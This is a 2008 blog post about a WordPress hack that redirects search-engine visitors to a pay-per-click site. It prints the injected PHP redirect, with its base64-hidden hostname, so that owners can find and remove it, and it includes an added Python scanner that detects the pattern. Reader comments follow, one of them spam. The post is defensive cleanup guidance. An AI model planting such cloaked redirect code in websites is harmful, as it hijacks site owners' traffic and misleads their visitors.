Saturday, June 07, 2008

WordPress AnyResults.net Hack - Search Engine Visits Redirecting to AnyResults.net


Many sites running WordPress blogs have been hacked by a very clever and hidden PHP injection that redirects all requests arriving from Google, MSN, Live, AltaVista, Ask, Yahoo, and other search engines to 'anyresults.net', a site filled with pay-per-click ads and redirects to other landing pages. This is a very clever trick because visiting the site through direct navigation (typing in the address) or a bookmark does not display the problem. Only search engine visits are redirected, and many site owners are delayed in discovering the problem until they notice huge dips in traffic or revenue stats.

Many blogs and discussions on this provide very little help in finding this exploit. Some point to a plug-in file as the culprit, some to the wp-options table in the database; none of these were very helpful in this case.

If your blog is affected by this hack, check your wp-blog-header.php file for the following code:

<?php
$seref=array("google","msn","live","altavista","ask","yahoo","aol","cnn","weather","alexa");
$ser=0;
foreach($seref as $ref)
    if(strpos(strtolower($_SERVER['HTTP_REFERER']),$ref)!==false){ $ser="1"; break; }
if($ser=="1" && sizeof($_COOKIE)==0){
    header("Location: http://".base64_decode("YW55cmVzdWx0cy5uZXQ=")."/");
    exit;
}
?>

Remove it completely or comment it out.

This code stores the string 'anyresults.net' as a base64 value, which made it much more difficult to find the redirect string in any of the files.
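Because the hostname is hidden in base64, a plain text search for 'anyresults.net' finds nothing. The sketch below is an added example, not code from the original post: it decodes every base64_decode() string literal in a PHP source and flags a file that combines a referer check, a Location header and a hidden hostname. The function names and the clean sample file are assumptions made for illustration.

```python
import base64
import binascii
import re

# Matches base64_decode("...") / base64_decode('...') with a literal argument.
B64_CALL = re.compile(r"""base64_decode\(\s*(["'])([A-Za-z0-9+/=]+)\1\s*\)""")
# Decoded text that looks like a hostname.
HOSTNAME = re.compile(r"^[a-z0-9-]+(\.[a-z0-9-]+)+$", re.I)


def decoded_literals(php_source):
    """Return the decoded text of every base64_decode() string literal."""
    out = []
    for _, blob in B64_CALL.findall(php_source):
        try:
            out.append(base64.b64decode(blob, validate=True).decode("ascii"))
        except (binascii.Error, UnicodeDecodeError):
            continue  # not valid base64, or not plain text: ignore
    return out


def scan(php_source):
    """Report which traits of the redirect described above are present."""
    hosts = [s for s in decoded_literals(php_source) if HOSTNAME.match(s)]
    return {
        "checks_referer": "HTTP_REFERER" in php_source,
        "sends_location": re.search(r"header\(\s*[\"']Location:", php_source) is not None,
        "hidden_hosts": hosts,
    }


def is_suspicious(php_source):
    """True only when all three traits appear in the same file."""
    r = scan(php_source)
    return r["checks_referer"] and r["sends_location"] and bool(r["hidden_hosts"])


# The injected snippet from this post (search-engine list shortened), and a
# constructed clean file for contrast.
INJECTED = '''<?php $seref=array("google","msn"); $ser=0; foreach($seref as $ref) if(strpos(strtolower($_SERVER['HTTP_REFERER']),$ref)!==false){ $ser="1"; break; } if($ser=="1" && sizeof($_COOKIE)==0){ header("Location: http://".base64_decode("YW55cmVzdWx0cy5uZXQ=")."/"); exit; }?>'''
CLEAN = '''<?php require_once(dirname(__FILE__) . '/wp-load.php'); wp(); ?>'''

if __name__ == "__main__":
    for name, src in (("injected", INJECTED), ("clean", CLEAN)):
        print(name, is_suspicious(src), scan(src)["hidden_hosts"])
```

To check a real installation, read each .php file under the WordPress directory and pass its contents to is_suspicious(); a hit is a reason to inspect the file by hand, not proof of compromise.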

It is recommended that you upgrade all of your WordPress sites to the most current stable version immediately. This attack is possible against any site not running the latest version of WordPress, so you can understand the urgency of upgrading.

I'd like to plug the web's best web hosting provider, Rackspace Server Admins, for helping me troubleshoot and identify this hack. As always, I seriously recommend hosting your websites with Rackspace.

While seeking solutions I discovered some more good ideas on keeping your WordPress site safe in Matt Cutts' blog post: Three Tips to Protect Your Wordpress Installation.

http://www.youtube.com/watch?v=SxBslUERo9c


3 Comments:

At Tuesday, June 24, 2008 , Blogger Brian McQuay said...

I noticed the same thing happening on one of my blogs. I noticed because I am using the Google sitemap plugin and Google was notifying me in Google Webmaster tools that one of the URLs in the sitemap was returning a 302. I checked and checked using curl but couldn't reproduce the 302. I used a few online tools and some did give me a 302->301->200 and loop around the site randomly.

My guess is they are randomly performing redirects to their own site at times as well. I started disabling plugins starting with one which has repeatedly caused problems for my site, Angsuman's Translator Plugin Pro.

All the random redirects stopped when I removed the plugin. What's worse is the plugin code is encrypted so it's difficult to tell what exactly is going on. My guess is they're using the encrypted plugin to randomly redirect visitors to their own sites in multiple different languages.

 
At Wednesday, September 17, 2008 , Anonymous Anonymous said...

After a superantispyware complete search of all files it didn't find anything but some tracking cookies

But the tracking cookies were in the
C:\windows\system32\config\systemprofile folder
(I'm guessing this is the profile the system service uses)

the cookies were back after superantispyware deleted them and rebooted

iexplore had the cookies locked (after a clean reboot)
using the most excellent software unlocker

www.softpedia.com/get/System/System-Miscellaneous/Unlocker.shtml

I was able to unlock and delete the cookies (I deleted all the files in all the folders I found except user.dat (I left the folders)

my Google search is working again

By the way there was a redirect cookie in the folder

Back to normal and feeling lucky (Google pun)
Danny

 
At Monday, March 23, 2009 , Blogger Daphne23 UK said...

To have a successful online business, a perfect online business system is required, and to create a successful online business system one has to analyze the current situation of one's business, set achievable goal, develop strategy/tactic, organize for the online presence (take action, control and form resources). http://www.infyecommercesolution.com/

 
